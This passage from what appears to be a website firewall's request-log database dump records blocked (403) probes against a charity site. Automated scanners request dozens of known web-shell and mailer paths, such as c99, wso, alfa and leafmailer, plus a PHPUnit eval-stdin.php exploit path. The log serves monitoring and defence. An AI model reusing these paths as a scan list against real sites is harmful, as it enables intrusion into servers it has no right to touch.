Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','Isp8JWQg26AbrqZ0uL7R3eiX',0,1673954743.8963,147,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','m4FJesRH1KqgDvoy0Qw5a9dE',0,1673954744.9776,133,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/ru.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','CPx5Us90tGKurLVbapomNA8i',0,1673954746.0372,104,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/if.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','NowmpMaLs4ri0TJUYX5nAv1t',0,1673954747.0675,128,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','7vya3NAemcCtkDJTIW9jZuLn',0,1673954748.1224,112,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','4WBlRfJ6DCMKtLYjX3FQUqGo',0,1673954749.1462,99,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/skipper.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','8VMe0pNA3q9GaUXKloYQ4cCT',0,1673954750.1619,141,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/skippershell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','TVkLisfq097ZNm38xePYU6Og',0,1673954751.2118,90,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/tttt.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','g1j9xThADfXcrC8V7zNMHi6v',0,1673954752.2249,98,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/tshop.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','XQpavRBKPm4VbJ9Sq5luneZD',0,1673954753.2399,150,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','k7MTavnq6UpzRwxh0LACPZse',0,1673954754.3470,104,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','KqNcaIjiP3MdY8HWkXFlRBsu',0,1673954755.3837,133,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/inje3ctor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','REinDtQya06Zv8SuleOf2UFV',0,1673954756.4368,95,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/saudi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','K8mwUDbo9LefIHngJjV3NMPz',0,1673954757.4572,112,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','LxArnXtjNUWVT9gzO2ZpCmMQ',0,1673954758.5088,98,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alfashell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','fZrxKa51OV2PvSJkEygGp4Hj',0,1673954759.5491,102,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/my_alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','XJnjge28US6EiyVzlwDqH0YQ',0,1673954760.5856,105,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/uploader.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','1WH6En7rYgZS48J3TyXv5wM9',0,1673954761.6265,97,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','EjPyOvmQVAdz3thlWuFp9eon',0,1673954762.6522,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/hacked.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','qN46ZsjKEtUfYQOzSRM5m01d',0,1673954763.6561,104,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','wx8yVnrYAkdFOs0fTtMEuoiQ',0,1673954764.6914,111,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','uaKNGLhCesTQlcfPtz8X9RZ4',0,1673954765.7250,104,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/Navir.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','MxwP6HGARr7d4QSzK80ltbBY',0,1673954766.7504,95,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/cmd13.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','KI5kwlXvHEA3tVz4O8YWN7yo',0,1673954767.7610,99,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/inc20k1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','s1omN0vrwVJ2lZBU3ScPIpiX',0,1673954768.7838,127,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','pPliyUwO67ABYXZIK5231uNk',0,1673954769.8670,120,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','CvAJR8r5NPjYxadkKzwnqIti',0,1673954770.9167,113,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/swm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','K18ZwSPDN2nFxlbyr0VcvJsg',0,1673954772.2187,103,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','ZjBmnMJ7kdWfiE6pT89lGqyt',0,1673954773.2453,162,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','vy67ogfOAaxh198qucSIbE3X',0,1673954774.3524,138,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','1uSPOymq2hR9wldAgMYEXHVo',0,1673954775.4118,123,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','79leaZHjM6n2QdCVNbTJzKIs',0,1673954776.5018,95,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','e69OJ4vpI1ticK5GmP8kQ7NM',0,1673954777.5222,127,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/edit-form.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','gDdClGfNvSez1UiPAuFcp7KM',0,1673954778.5765,158,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/LEAF.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','Y9XOAEtrkhBcFswaLZ5ln283',0,1673954779.7025,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','2fOqzyg85aZE9wC1ButkR70v',0,1673954780.7232,118,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','cnskLuWNRKIyeTbfCwSE6zQJ',0,1673954781.7867,141,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','ALfmMP2oiyvKdU0Hb6NJROTW',0,1673954782.8539,97,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/Leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','2xYhEzk5nj4tZKWJdDMCOeFU',0,1673954783.8770,145,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','JtPGHowxgYRK3qeZAh9uNF0b',0,1673954784.9382,124,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','Z5YS8OeIFPBXTdf3nAquHj6N',0,1673954785.9715,144,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/srx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','NegtunzcCUVlk5X4Ts1S0Epd',0,1673954787.0448,95,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','70PyJqanMSgwGcfiWA1LXukh',0,1673954788.0566,104,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','1cPzOmgy2GZFIW7pi0MuwvVj',0,1673954789.0779,93,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/XxX.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','z2yIpXjaJ79RAwdUlu6Kk4YM',0,1673954790.0885,147,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','H4iWBgI2x9PZbjJnMELmTOS3',0,1673954791.1672,150,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','YdMPJu9GqAjgxFzm6Zi7EkBe',0,1673954792.2488,133,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','823aXjHFobcYqGJD6BA4nKMp',0,1673954793.3046,144,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','cf6T1UlsiNo8YgWzED2dvLkr',0,1673954794.3737,125,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/gaza.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','YOlUnfBbzshoH9E26pyWeFiI',0,1673954795.4161,106,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','v3CJFiPosMuLNXDpV9dtqOG7',0,1673954796.4443,91,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','lY6sTKriLxjQmW1USnHk4c5I',0,1673954797.4531,98,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','yUsRnPWvgXV0uqMcDltjTakY',0,1673954798.4808,109,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wso1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','6gdyrMO5lVULce0fiPhDY4ZH',0,1673954799.5142,123,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','gpJmtzoI6sBdrL7G5cWXFCPv',0,1673954800.5598,89,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/Lux.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','nM82iH0PvVZOJgSk63XFYBja',0,1673954801.5710,118,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','R15bAiaJECP8cHxwS0gNTW6B',0,1673954802.6150,114,'','GET',403,0,700,0,1,'',0),('8.210.20.42',147985450,'','https://equalitywalk.org.uk/shell20211028.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/shell20211028.php\"}','7nMR2GwAkfxLdu4aTpF5ViSE',0,1673955737.5908,130,'','GET',403,0,700,0,1,'',0),('8.210.20.42',147985450,'','https://equalitywalk.org.uk/shell20211028.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/shell20211028.php\"}','koWPiuXRycLOVYwNtQ5Kb6lE',0,1673955742.6580,125,'','GET',403,0,700,0,1,'',0),('144.217.94.167',2430164647,'','https://equalitywalk.org.uk/style.php?sig=rename','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','0O2Fnhk71dqM5PDQyxrTvap3',0,1673957159.2004,144,'','GET',403,0,700,0,1,'',0),('144.217.94.167',2430164647,'','https://equalitywalk.org.uk/wp-admin/style.php?sig=rename','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.107 Safari\\/537.36\"}','mETSAizZ3Ot6QVb5Fvkq9xwn',0,1673957159.3110,105,'','GET',403,0,700,0,1,'',0),('200.58.112.71',3359273031,'','https://equalitywalk.org.uk/wp-admin/css/colors/blue/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-admin\\/css\\/colors\\/blue\\/index.php\"}','Imvx1FcXLQGZMlqR3HCBdOg5',0,1673959618.8592,141,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.equalitywalk.org.uk/theme.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.103 Safari\\/537.36\"}','oO8z6Er1D3LJAcqkUhwN9Yag',0,1673960692.7351,116,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.equalitywalk.org.uk/radio.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.103 Safari\\/537.36\"}','faZBIbzerJF1PdU8RKpjNqyV',0,1673960699.8538,132,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.equalitywalk.org.uk/Chitoge.php?Chitoge','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.103 Safari\\/537.36\"}','r2AupiCSmNfw4az87FhgdYOZ',0,1673960710.1260,108,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.equalitywalk.org.uk/mod_config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.103 Safari\\/537.36\"}','hXJE7G14MwFY6Ha0AKRTCgU8',0,1673960719.8119,143,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.equalitywalk.org.uk/haccess.php?send=ok','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.103 Safari\\/537.36\"}','DdEOMIaJFngc5Rb6XYoGSr3A',0,1673960733.6974,117,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.equalitywalk.org.uk/content.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.103 Safari\\/537.36\"}','eUfykod7nmItr2BbOsP1Xh8z',0,1673960741.9927,114,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.equalitywalk.org.uk/Marvins.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.103 Safari\\/537.36\"}','cfr3IBsSFUzlJtu2eN5gKq7Z',0,1673960752.2816,104,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.equalitywalk.org.uk/Legion.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.103 Safari\\/537.36\"}','ODbxqpMfd671AeRwi3aVYnsW',0,1673960761.9490,110,'','GET',403,0,700,0,1,'',0),('194.163.158.132',3265502852,'','https://www.equalitywalk.org.uk/wp-includes/versions.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','kZdyE8pn74wGKDuHqQ6g1Ocx',0,1673966043.4199,116,'','POST',403,0,700,0,1,'',0),('194.163.158.132',3265502852,'','https://www.equalitywalk.org.uk/wp-admin/assets/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','aIUXoERKV4HSpl5TiqJ6tcfg',0,1673966043.6008,95,'','GET',403,0,700,0,1,'',0),('194.163.158.132',3265502852,'','https://www.equalitywalk.org.uk/wp-includes/fonts/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','BMDw49oTUFgN05bjrQHeLpl6',0,1673966043.8546,86,'','GET',403,0,700,0,1,'',0),('194.163.158.132',3265502852,'','https://www.equalitywalk.org.uk/wp-includes/js/thickbox/themes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','80grYixn9ZMX5zsAbWoUqBeE',0,1673966044.0351,112,'','GET',403,0,700,0,1,'',0),('157.245.41.15',2650089743,'','https://equalitywalk.org.uk/cong.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/cong.php\"}','FZL2xaOPytlq9cgKBWfnhXMi',0,1673984761.7311,109,'','GET',403,0,700,0,1,'',0),('157.245.41.15',2650089743,'','https://equalitywalk.org.uk/cong.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/cong.php\"}','iC6U2rkp8xw1aPmo5RvdQLTq',0,1673984767.9827,116,'','GET',403,0,700,0,1,'',0),('199.195.250.129',3351509633,'','https://equalitywalk.org.uk/sqlbuddy/login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.47 Safari\\/537.36\"}','A14LoCtluvkqFRVwhUNQaHJO',0,1673985962.2477,148,'','GET',403,0,700,0,1,'',0),('199.195.250.129',3351509633,'','https://equalitywalk.org.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:68.0) Gecko\\/20100101 Firefox\\/68.0\"}','Cvh2fVJgn39UW0ziwldQMTKY',0,1673985962.5509,97,'','POST',403,0,700,0,1,'',0),('199.195.250.129',3351509633,'','https://equalitywalk.org.uk/spread.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit\\/538.36 (KHTML, like Gecko)\"}','9EoGUPTKBps34yStY5rwJWuv',0,1673985962.6715,92,'','POST',403,0,700,0,1,'',0),('20.10.11.51',336202547,'','https://www.equalitywalk.org.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','vBZ0Dt3REaMQ2kx14YOUcVCG',0,1673986014.5391,143,'','GET',403,0,700,0,1,'',0),('20.10.11.51',336202547,'','https://www.equalitywalk.org.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) 